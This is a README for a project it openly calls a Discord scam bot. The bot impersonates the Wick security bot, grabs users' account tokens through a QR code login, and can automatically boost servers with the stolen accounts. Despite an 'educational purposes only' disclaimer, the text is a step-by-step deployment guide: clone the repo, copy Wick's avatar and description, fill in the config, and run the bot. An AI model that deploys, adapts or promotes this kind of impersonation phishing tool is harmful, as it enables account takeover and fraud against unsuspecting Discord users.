Wick Discord scam bot that grabs tokens via a QR Code.
Make sure to star this project ⭐!
This project is for Educational Purposes ONLY. This was not meant for malicous use.
When using this Discord Bot, you hold responsibility for any consequences that you occur.
- Exact Clone (Looks exactly like the real wick bot when set up properly)
- Modular Design (add commands and events exactly like a real bot. also has a customisable config file)
- Automatic Boosting (fetches and boosts server instantly when logged. if option selected)
- Clone Repository
gh repo clone ulnk/scam
- Install Dependencies
yarn
ornpm install
- Create Bot go to bot dashboard
- ENABLE ALL PARTIALS AND INTENTS FOR YOUR BOT
- Without all partials and intents, the bot will not function.
- Change profile picture to wick.png
- Change description to
Discord Security Bot made to protect servers from raids, nukes and more things!
https://wickbot.com/
- Edit
config.json
file- Change the all of the config.json options to your bot .
- (NOTE: KEEP ALL CHANNELS INSIDE THE SAME GUILD)
- Add all emojis to server
- Without, the emojis will be
undefined
- You can select all and drag into the add emojis discord page
- (NOTE: YOU HAVE TO ADD ALL EMOJI IDS INTO CONFIG.JSON)
- Without, the emojis will be
- Start
yarn dev
ornpm run dev
- if using heroku, make sure you have the start script